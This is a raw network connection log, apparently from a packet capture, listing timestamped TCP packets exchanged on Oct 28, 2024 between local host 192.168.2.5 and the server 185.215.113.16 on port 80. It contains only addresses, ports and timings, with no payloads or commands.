Oct 28, 2024 02:07:25.776690960 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.776695013 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.776726007 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777059078 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777076006 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777089119 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777095079 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777096987 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777127981 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777225971 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777283907 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777292013 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777302980 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777333021 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777338028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777348995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777360916 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777373075 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.777383089 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.777406931 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.854823112 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.854835033 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.854846001 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.854871988 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.854885101 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.854893923 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.854921103 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.854949951 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855014086 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855024099 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855034113 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855041981 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855061054 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855205059 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855214119 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855254889 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855273962 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855284929 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855294943 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855319977 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855350018 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855428934 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855451107 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855460882 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855470896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855482101 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855510950 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855732918 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855742931 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855755091 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855766058 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855776072 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855789900 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855802059 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855807066 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855823994 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.855824947 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855835915 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.855859041 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856096029 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856136084 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856152058 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856162071 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856192112 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856200933 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856213093 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856241941 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856333017 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856353998 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856379986 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856394053 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856405020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856415987 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856443882 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856576920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856677055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856686115 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856698036 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856709957 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856709957 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856722116 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856729031 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856750011 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856911898 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856924057 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856935024 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.856959105 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.856978893 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890352964 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890413046 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890435934 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890455008 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890467882 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890470028 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890480995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890510082 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890527010 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890647888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890765905 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890777111 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890786886 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890806913 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890818119 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890829086 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890831947 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.890841007 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.890863895 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.892740011 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.892818928 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.892851114 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.892862082 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.892911911 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893310070 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893352985 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893362999 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893373966 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893400908 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893426895 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893471003 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893502951 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893515110 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893551111 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893570900 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893584967 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893608093 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893767118 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893778086 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893791914 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893804073 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893815994 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.893896103 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.893896103 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894076109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894092083 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894103050 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894115925 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894124031 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894126892 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894144058 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894144058 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894150972 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894153118 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894193888 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894445896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894457102 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894469976 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894481897 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894493103 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894505024 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894532919 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894718885 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894731998 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894743919 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894784927 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894784927 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894793987 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894807100 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894819021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894831896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894844055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.894855022 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.894862890 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.935256958 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972317934 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972335100 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972366095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972385883 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972395897 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972405910 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972409010 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972419024 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972428083 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972457886 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972549915 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972562075 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972570896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972585917 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972609997 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972697020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972702026 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972707987 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972712994 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972733974 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972758055 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972878933 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972913980 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972927094 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.972961903 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.972987890 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973001003 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973031998 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973185062 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973195076 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973222971 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973243952 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973256111 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973269939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973289013 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973293066 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973301888 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973308086 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973347902 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973527908 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973541021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973551989 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973573923 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973645926 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973658085 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973670959 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973680973 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973685026 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973701000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973709106 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973712921 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973725080 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.973727942 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.973762989 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.974127054 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974138021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974145889 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974155903 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974176884 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.974199057 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.974328995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974340916 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974366903 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974376917 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974386930 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974395037 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.974399090 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.974419117 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.974431992 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.007958889 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.007994890 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008004904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008023024 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008033991 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008049965 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.008059025 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008061886 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.008071899 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008085012 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008110046 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.008124113 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.008279085 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008311033 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008354902 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008364916 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.008485079 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.010318041 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010329962 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010340929 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010458946 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.010808945 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010833025 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010854006 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010855913 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.010864973 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.010895014 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011023045 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011056900 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011116028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011132956 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011146069 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011157990 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011174917 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011192083 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011363983 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011492014 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011502981 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011514902 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011526108 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011532068 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011538982 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011552095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011559963 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011564970 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011569977 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011580944 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011593103 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011596918 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011636019 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011735916 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011749029 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011761904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011780024 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011873007 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011883974 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011897087 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011908054 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011909008 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011920929 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.011933088 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.011965990 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.012095928 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.012149096 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.012159109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.012188911 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.012217999 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.012234926 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.012271881 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.013423920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.013449907 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.013463020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.013465881 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.013473988 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.013487101 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.013499975 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.013528109 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.089776993 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089839935 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089850903 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089869022 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089881897 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.089890957 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089895010 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089900017 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.089941978 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.089967966 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089982033 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.089992046 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.090015888 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.090056896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.090069056 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.090080023 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.090090990 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.090142012 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.303688049 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.357135057 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.493881941 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.499495983 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499593973 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499607086 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499614000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499620914 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499629021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499653101 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.499690056 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:26.499752998 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:26.499766111 CET	80	49724	185.215.113.16	192.168.2.5
